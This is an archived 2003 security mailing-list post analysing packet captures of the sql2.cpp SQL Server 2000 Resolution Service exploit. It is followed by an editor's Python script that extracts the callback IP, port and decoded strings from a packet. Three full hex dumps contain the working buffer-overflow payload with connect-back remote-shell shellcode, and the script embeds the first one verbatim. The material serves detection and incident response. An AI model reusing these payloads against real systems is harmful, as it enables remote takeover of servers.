Variant or original posting to packetstormsecurity - long

From: oobs3c02at_private
Date: Tue Jan 28 2003 - 11:16:10 PST


    All,
    
    I have been working on my GCIA paper and was using the original sql2.cpp posted 
    on packetstormsecurity.org.  So, as you can imagine, I nearly fell off my chair 
    when sqlslammer hit.  I know that traces of Dave Litchfield's code (modified by 
    cnhonker) have been posted to this board, but I wanted to throw this information 
    out there and I hope it helps.  
    
    When I compiled the original code using LCC and ran it against a vulnerable SQL 
    2k database, I found that the source port used was 53, as you can see in the 
    traces below.  I don't know if it's because of the compiler I used that this 
    ended up using source port 53, or what; anyone with ideas on that, I'd 
    appreciate it.  
    
    The exploit posted on packetstormsecurity.org gave a remote command shell to 
    the attacker (much nastier than sqlslammer).  The attacker could specify the 
    port and the IP address at the command line for the victim machine to connect 
    back to.  This allowed for the UDP packet to be spoofed but still provide a 
    specific target for the victim to connect back to.  I was interested in finding 
    the exact place in the payload that gives the IP address that the attacker 
    wishes the victim to connect back to.  I've included traces below with 
    different addresses specified at the command line.  The sections of the dump 
    marked below correlate to the IP I gave at the command line.  This should help 
    anyone who saw this signature (not the slammer sig) to identify if any of their 
    systems are communicating back to an attacker.
    
    Targeted to return to 192.168.1.10 = 0xc0A8010A
    01:25:03.738897 192.168.1.10.53 > 192.168.1.7.1434: [udp sum ok]  1089 op8+ 
    [b2&3=0x4141] [16962a] [16706q] [16963n] [17219a
    u][|domain] (ttl 128, id 17335, len 514)
                             4500 0202 43b7 0000 8011 71d2 c0a8 010a
                             c0a8 0107 0035 059a 01ee aecf 0441 4141
                             4142 4242 4243 4343 4344 4444 4445 4545
                             4546 4646 4647 4747 4748 4848 4849 4949
                             494a 4a4a 4a4b 4b4b 4b4c 4c4c 4c4d 4d4d
                             4d4e 4e4e 4e4f 4f4f 4f50 5050 5051 5151
                             5152 5252 5253 5353 5354 5454 5455 5555
                             5556 5656 5657 5757 5758 5858 58dc c9b0
                             42eb 0e41 4243 4445 4601 70ae 4201 70ae
                             4290 9090 9090 9090 9055 8bec 6818 10ae
                             4268 1010 ae42 eb03 5beb 05e8 f8ff ffff
                             beff ffff ff81 f6ae feff ff03 de90 9090
                             9090 33c9 b144 b258 3013 83eb 01e2 f943
                             538b 75fc ff16 5033 c0b0 0c03 d853 ff16
                             5033 c0b0 1003 d853 8b45 f450 8b75 f8ff
                             1650 33c0 b00c 03d8 538b 45f4 50ff 1650
                             33c0 b008 03d8 538b 45f0 50ff 1650 33c0
                             b010 03d8 5333 c033 c966 b904 0150 e2fd
    ------------------------------------------------------------------
    ------------next line contains the IP to connect back to----------
                             8945 dc89 45d8 bfc0 a801 0a89 7dd4 4040
    ------------------------------------------------------------------
                             8945 d066 b8ff ff66 35ff ca66 8945 d26a
                             016a 028b 75ec ffd6 8945 ec6a 108d 75d0
                             568b 5dec 538b 45e8 ffd0 83c0 4489 8558
                             ffff ff83 c05e 83c0 5e89 4584 895d 9089
                             5d94 895d 988d bd48 ffff ff57 8dbd 58ff
                             ffff 5733 c050 5050 83c0 0150 83e8 0150
                             508b 5de0 5350 8b45 e4ff d033 c050 c604
                             2461 c644 2401 6468 5468 7265 6845 7869
                             7454 8b45 f050 8b45 f8ff 10ff d090 2f2b
                             6a07 6b6a 763c 3434 5858 333d 2a36 3d34
                             6b6a 763c 3434 5858 5858 0f0b 190b 373b
                             333d 2c19 5858 3b37 3636 3d3b 2c58 1b2a
                             3d39 2c3d 082a 373b 3d2b 2b19 5858 3b35
                             3c58 7d25 4ab8
    
    Targeted to return to 192.168.1.50 = 0xc0A80132
    01:26:19.634550 192.168.1.10.53 > 192.168.1.7.1434: [udp sum ok]  1089 op8+ 
    [b2&3=0x4141] [16962a] [16706q] [16963n] [17219a
    u][|domain] (ttl 128, id 17577, len 514)
                             4500 0202 44a9 0000 8011 70e0 c0a8 010a
                             c0a8 0107 0035 059a 01ee 86cf 0441 4141
                             4142 4242 4243 4343 4344 4444 4445 4545
                             4546 4646 4647 4747 4748 4848 4849 4949
                             494a 4a4a 4a4b 4b4b 4b4c 4c4c 4c4d 4d4d
                             4d4e 4e4e 4e4f 4f4f 4f50 5050 5051 5151
                             5152 5252 5253 5353 5354 5454 5455 5555
                             5556 5656 5657 5757 5758 5858 58dc c9b0
                             42eb 0e41 4243 4445 4601 70ae 4201 70ae
                             4290 9090 9090 9090 9055 8bec 6818 10ae
                             4268 1010 ae42 eb03 5beb 05e8 f8ff ffff
                             beff ffff ff81 f6ae feff ff03 de90 9090
                             9090 33c9 b144 b258 3013 83eb 01e2 f943
                             538b 75fc ff16 5033 c0b0 0c03 d853 ff16
                             5033 c0b0 1003 d853 8b45 f450 8b75 f8ff
                             1650 33c0 b00c 03d8 538b 45f4 50ff 1650
                             33c0 b008 03d8 538b 45f0 50ff 1650 33c0
                             b010 03d8 5333 c033 c966 b904 0150 e2fd
    ------------------------------------------------------------------
    ------------next line contains the IP to connect back to----------
                             8945 dc89 45d8 bfc0 a801 3289 7dd4 4040
    ------------------------------------------------------------------
                             8945 d066 b8ff ff66 35ff ca66 8945 d26a
                             016a 028b 75ec ffd6 8945 ec6a 108d 75d0
                             568b 5dec 538b 45e8 ffd0 83c0 4489 8558
                             ffff ff83 c05e 83c0 5e89 4584 895d 9089
                             5d94 895d 988d bd48 ffff ff57 8dbd 58ff
                             ffff 5733 c050 5050 83c0 0150 83e8 0150
                             508b 5de0 5350 8b45 e4ff d033 c050 c604
                             2461 c644 2401 6468 5468 7265 6845 7869
                             7454 8b45 f050 8b45 f8ff 10ff d090 2f2b
                             6a07 6b6a 763c 3434 5858 333d 2a36 3d34
                             6b6a 763c 3434 5858 5858 0f0b 190b 373b
                             333d 2c19 5858 3b37 3636 3d3b 2c58 1b2a
                             3d39 2c3d 082a 373b 3d2b 2b19 5858 3b35
                             3c58 da57 f90d
    
    Targeted to return to 192.168.1.100 = 0xc0A80164
    01:27:11.975255 192.168.1.10.53 > 192.168.1.7.1434: [udp sum ok]  1089 op8+ 
    [b2&3=0x4141] [16962a] [16706q] [16963n] [17219a
    u][|domain] (ttl 128, id 17746, len 514)
                             4500 0202 4552 0000 8011 7037 c0a8 010a
                             c0a8 0107 0035 059a 01ee 54cf 0441 4141
                             4142 4242 4243 4343 4344 4444 4445 4545
                             4546 4646 4647 4747 4748 4848 4849 4949
                             494a 4a4a 4a4b 4b4b 4b4c 4c4c 4c4d 4d4d
                             4d4e 4e4e 4e4f 4f4f 4f50 5050 5051 5151
                             5152 5252 5253 5353 5354 5454 5455 5555
                             5556 5656 5657 5757 5758 5858 58dc c9b0
                             42eb 0e41 4243 4445 4601 70ae 4201 70ae
                             4290 9090 9090 9090 9055 8bec 6818 10ae
                             4268 1010 ae42 eb03 5beb 05e8 f8ff ffff
                             beff ffff ff81 f6ae feff ff03 de90 9090
                             9090 33c9 b144 b258 3013 83eb 01e2 f943
                             538b 75fc ff16 5033 c0b0 0c03 d853 ff16
                             5033 c0b0 1003 d853 8b45 f450 8b75 f8ff
                             1650 33c0 b00c 03d8 538b 45f4 50ff 1650
                             33c0 b008 03d8 538b 45f0 50ff 1650 33c0
                             b010 03d8 5333 c033 c966 b904 0150 e2fd
    ------------------------------------------------------------------
    ------------next line contains the IP to connect back to----------
                             8945 dc89 45d8 bfc0 a801 6489 7dd4 4040
    ------------------------------------------------------------------
                             8945 d066 b8ff ff66 35ff ca66 8945 d26a
                             016a 028b 75ec ffd6 8945 ec6a 108d 75d0
                             568b 5dec 538b 45e8 ffd0 83c0 4489 8558
                             ffff ff83 c05e 83c0 5e89 4584 895d 9089
                             5d94 895d 988d bd48 ffff ff57 8dbd 58ff
                             ffff 5733 c050 5050 83c0 0150 83e8 0150
                             508b 5de0 5350 8b45 e4ff d033 c050 c604
                             2461 c644 2401 6468 5468 7265 6845 7869
                             7454 8b45 f050 8b45 f8ff 10ff d090 2f2b
                             6a07 6b6a 763c 3434 5858 333d 2a36 3d34
                             6b6a 763c 3434 5858 5858 0f0b 190b 373b
                             333d 2c19 5858 3b37 3636 3d3b 2c58 1b2a
                             3d39 2c3d 082a 373b 3d2b 2b19 5858 3b35
                             3c58 c7a1 3e2a
    
    Anyone wanting the bpf traces, send me an email directly and 
    I'll send them along.
    
    Regards,
    
    Jim
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    
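    Added example (editor's code for this archive copy, not part of Jim's post and not sql2.cpp itself): 
    a small Python triage script that takes a tcpdump -x style hex dump like the three above, bounds the 
    UDP payload by the length fields (each dump carries 518 bytes against an IP total length of 514, so 
    the last four bytes are a capture trailer and must not be treated as payload), and pulls out what a 
    responder wants to know. The decoding follows the bytes in the first dump: the sequence 
    89 45 dc / 89 45 d8 / bf c0 a8 01 0a / 89 7d d4 is mov edi,imm32 followed by a store into a 
    sockaddr_in on the stack, so the four bytes after bf are the callback address in network byte order, 
    which is exactly the span Jim marked; just before it, mov ax,0xffff / xor ax,0xcaff builds sin_port 
    without a NUL byte (port 53 in these captures); and the loop xor ecx,ecx / mov cl,0x44 / mov dl,0x58 / 
    xor [ebx],dl decodes the last 0x44 bytes of the payload with key 0x58, which is why the import names 
    sit at the end of the dump as 0x58-padded gibberish. The script also records the return address 
    0x42b0c9dc that closes the 0x41..0x58 filler; Slammer uses the same one, so that value alone does 
    not separate this exploit from the worm, whereas a decoded WSASocketA / connect / CreateProcessA / cmd 
    string set plus a sockaddr_in with a callback address does. The embedded packet is the first dump 
    from the post, copied verbatim; all field and function names are the editor's.

```python
"""Triage helper for the connect-back SQL Server Resolution Service exploit packets in the post.
Editor's added example, not code from the post or from sql2.cpp."""
import ipaddress
import re
import struct

# First hex dump from the post (tcpdump -x output, callback target 192.168.1.10), copied verbatim.
PACKET_HEX = """
4500 0202 43b7 0000 8011 71d2 c0a8 010a
c0a8 0107 0035 059a 01ee aecf 0441 4141
4142 4242 4243 4343 4344 4444 4445 4545
4546 4646 4647 4747 4748 4848 4849 4949
494a 4a4a 4a4b 4b4b 4b4c 4c4c 4c4d 4d4d
4d4e 4e4e 4e4f 4f4f 4f50 5050 5051 5151
5152 5252 5253 5353 5354 5454 5455 5555
5556 5656 5657 5757 5758 5858 58dc c9b0
42eb 0e41 4243 4445 4601 70ae 4201 70ae
4290 9090 9090 9090 9055 8bec 6818 10ae
4268 1010 ae42 eb03 5beb 05e8 f8ff ffff
beff ffff ff81 f6ae feff ff03 de90 9090
9090 33c9 b144 b258 3013 83eb 01e2 f943
538b 75fc ff16 5033 c0b0 0c03 d853 ff16
5033 c0b0 1003 d853 8b45 f450 8b75 f8ff
1650 33c0 b00c 03d8 538b 45f4 50ff 1650
33c0 b008 03d8 538b 45f0 50ff 1650 33c0
b010 03d8 5333 c033 c966 b904 0150 e2fd
8945 dc89 45d8 bfc0 a801 0a89 7dd4 4040
8945 d066 b8ff ff66 35ff ca66 8945 d26a
016a 028b 75ec ffd6 8945 ec6a 108d 75d0
568b 5dec 538b 45e8 ffd0 83c0 4489 8558
ffff ff83 c05e 83c0 5e89 4584 895d 9089
5d94 895d 988d bd48 ffff ff57 8dbd 58ff
ffff 5733 c050 5050 83c0 0150 83e8 0150
508b 5de0 5350 8b45 e4ff d033 c050 c604
2461 c644 2401 6468 5468 7265 6845 7869
7454 8b45 f050 8b45 f8ff 10ff d090 2f2b
6a07 6b6a 763c 3434 5858 333d 2a36 3d34
6b6a 763c 3434 5858 5858 0f0b 190b 373b
333d 2c19 5858 3b37 3636 3d3b 2c58 1b2a
3d39 2c3d 082a 373b 3d2b 2b19 5858 3b35
3c58 7d25 4ab8
"""

HEX_LINE = re.compile(r"^[0-9a-fA-F]{2,4}(?:\s+[0-9a-fA-F]{2,4})*$")
# x86 byte patterns read off the dump (re.DOTALL: an operand byte may be 0x0a, i.e. '\n'):
#   33 c9 b1 NN b2 KK 30 13                xor ecx,ecx; mov cl,count; mov dl,key; xor [ebx],dl
DECODER_RE = re.compile(rb"\x33\xc9\xb1(.)\xb2(.)\x30\x13", re.DOTALL)
#   89 45 dc 89 45 d8 bf A B C D 89 7d d4  mov edi,imm32 stored as sockaddr_in.sin_addr (Jim's marked span)
CALLBACK_IP_RE = re.compile(rb"\x89\x45\xdc\x89\x45\xd8\xbf(.{4})\x89\x7d\xd4", re.DOTALL)
#   66 b8 X X 66 35 Y Y 66 89 45 d2        mov ax,X; xor ax,Y stored as sin_port (XOR hides the NUL in 0x0035)
CALLBACK_PORT_RE = re.compile(rb"\x66\xb8(..)\x66\x35(..)\x66\x89\x45\xd2", re.DOTALL)
RET_ADDR = b"\xdc\xc9\xb0\x42"  # 0x42b0c9dc little-endian, ends the 0x41..0x58 filler

def parse_hexdump(text):
    """Collect the hex-word lines of a tcpdump -x dump; summary and marker lines are skipped."""
    out = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if line and HEX_LINE.match(line):
            out += bytes.fromhex(line)
    return bytes(out)

def analyze_packet(pkt):
    """Parse the IPv4/UDP headers and recover the connect-back parameters from the payload."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if pkt[9] != 17:
        raise ValueError("not a UDP datagram")
    sport, dport, ulen = struct.unpack("!HHH", pkt[ihl:ihl + 6])
    payload = pkt[ihl + 8:ihl + ulen]  # bounded by the UDP length, so a capture trailer is dropped
    r = {
        "src": str(ipaddress.IPv4Address(pkt[12:16])), "sport": sport,
        "dst": str(ipaddress.IPv4Address(pkt[16:20])), "dport": dport,
        "payload_len": len(payload), "first_byte": payload[0],
        "trailer_bytes": max(0, len(pkt) - total_len),
        "ret_addr": None, "callback_ip": None, "callback_port": None, "decoded_strings": [],
    }
    i = payload.find(RET_ADDR)
    if i >= 0:
        r["ret_addr"] = "0x%08x" % struct.unpack("<I", payload[i:i + 4])[0]
    m = CALLBACK_IP_RE.search(payload)
    if m:
        r["callback_ip"] = str(ipaddress.IPv4Address(m.group(1)))
    m = CALLBACK_PORT_RE.search(payload)
    if m:  # ax = X ^ Y lands little-endian in sin_port, which is network byte order
        r["callback_port"] = int.from_bytes(bytes(x ^ y for x, y in zip(m.group(1), m.group(2))), "big")
    m = DECODER_RE.search(payload)
    if m:  # the loop walks backwards from the last payload byte, so decode the tail
        count, key = m.group(1)[0], m.group(2)[0]
        tail = bytes(b ^ key for b in payload[-count:])
        r["decoded_strings"] = [s.decode("ascii", "replace") for s in tail.split(b"\x00") if s]
    return r

if __name__ == "__main__":
    for k, v in analyze_packet(parse_hexdump(PACKET_HEX)).items():
        print("%-16s %s" % (k, v))
```

    Feeding the hex lines of the second and third dumps through parse_hexdump instead gives callback_ip 
    192.168.1.50 and 192.168.1.100, matching the lines Jim marked (3289 and 6489 after bfc0 a801). On a 
    real capture, treat any callback_ip that is not one of your own hosts as the address to hunt for in 
    outbound connection logs.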



    This archive was generated by hypermail 2b30 : Wed Jan 29 2003 - 08:32:51 PST